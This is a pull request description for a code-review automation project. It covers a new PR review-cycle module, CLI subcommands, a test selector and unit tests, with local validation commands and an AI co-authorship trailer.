- Reuses Phase 1 decision policy, schema, and batch-key derivation — no policy fork.
- Replaces the old ">3 iterations ask user" heuristic with a 24-cell stop-condition truth table and cap retagging to `defer` / `needs_human_decision` with full lineage.

## Changes
- **Runtime**:
  - New `scripts/quest_runtime/pr_review_cycle.py` exposing `normalize_pr_review_intake`, `build_fix_batches`, `select_validation_steps`, `classify_pr_loop_stop`, `retag_backlog_at_cap`.
  - Reuses `validate_findings`, `merge_and_dedupe`, `select_decision(..., at_loop_cap=True)`, `_batch_from_finding`, `append_deferred_findings` from Phase 1.
- **CLI**:
  - `scripts/quest_review_intelligence.py` gains `normalize-pr-intake`, `build-fix-batches`, and `classify-pr-stop` subcommands.
  - New `scripts/quest_select_tests.py` — thin CLI wrapper over the Level 0/1/2 selector.
- **Skills**:
  - `.skills/pr-shepherd/SKILL.md` adds Step 4.4 canonical loop (intake → decisions → batches → validation → push) and cap-behavior guidance.
- **Manifest / Docs**:
  - `.quest-manifest` entry for `pr_review_cycle.py`.
  - `scripts/README.md` updated with new module + subcommand invocations.
  - New quest journal `docs/quest-journal/review-intel-phase-2_2026-04-17.md`.
- **Tests**:
  - `tests/unit/test_pr_review_cycle.py` (new, 10 tests incl. parametrized 24-cell stop matrix and three CLI round-trips).
  - `tests/unit/test_quest_select_tests.py` (new, 5 tests incl. directory-scope shared-boundary regression).
  - `tests/unit/test_review_intelligence.py` regressions for normalized-intake + cap-loop decision reuse.

## Validation
- [x] **Run the full test suite**: `python3 -m pytest -q`. Expected: `351 passed`, no warnings.
- [x] **Walkthrough — PR intake normalization**: `printf '{"ci_checks":[{"job":"unit","state":"failing","failed_path":"scripts/x.py","kind_hint":"test_failure"}],"inline_comments":[{"commenter":"alice","body":"blocker memory leak","path":"scripts/x.py","line":42}],"general_comments":[],"existing_findings":[]}' > /tmp/intake.json && python3 scripts/quest_review_intelligence.py normalize-pr-intake --input /tmp/intake.json --output /tmp/findings.json && python3 scripts/quest_review_intelligence.py validate-findings --input /tmp/findings.json`. Expected: `ok: true`, two findings — one `pr-ci-001` with severity `high`, one `pr-inline-001` upgraded to `high` by the `blocker` keyword.
- [x] **Walkthrough — stop-condition matrix**: `python3 scripts/quest_review_intelligence.py classify-pr-stop --ci-state unknown --actionable 2 --iteration 3`. Expected: JSON with `stop: true`, `outcome: "cap_enforced"`, `retag_required: true`. Then rerun with `--ci-state green --actionable 0 --iteration 1` — expected `outcome: "success"`, `stop: true`, `retag_required: false`.
- [x] **Walkthrough — test selector**: `printf '{"finding_id":"F-001","source":"test","kind":"correctness","severity":"high","confidence":"high","path":"scripts/quest_runtime/foo.py","line":10,"summary":"test","why_it_matters":"test","evidence":["e"],"action":"fix","needs_test":true,"write_scope":["scripts/quest_runtime"],"related_acceptance_criteria":["AC-1"]}' > /tmp/f.json && python3 scripts/quest_select_tests.py --finding /tmp/f.json`. Expected: ordered `validation_steps` including Level 0 guards and at least one Level 2 step (directory-scope shared boundary triggers escalation per the new regression test).

Watch for: `classify-pr-stop` defaults the deferred JSONL path to `.quest/backlog/deferred_findings.jsonl` (relative to cwd) — confirm expected location when running from non-repo directories.

## Notes
- Review memory loading (per `ideas/2026-04-13-quest-memory-architecture.md`) remains out of scope for a follow-up quest. Phase 1's deferred-findings reservoir is already the reach across quest + PR review cycles — this PR extends that same reservoir via the new cap-retag path.
- Implements `ideas/2026-04-13-review-intelligence-canonical.md` Sections 3 and 4.

<pre>
     ▐▛███▜▌
    ▝▜█████▛▘
      ▘▘ ▝▝
Quest/Co-Authored by
Co-Authored-By: Claude Opus 4.7 <noreply@anthropic.com>
Co-Authored-By: Codex GPT-5.4 <noreply@openai.com>
in collaboration with KjellKod <kjell.hedstrom@gmail.com>
</pre>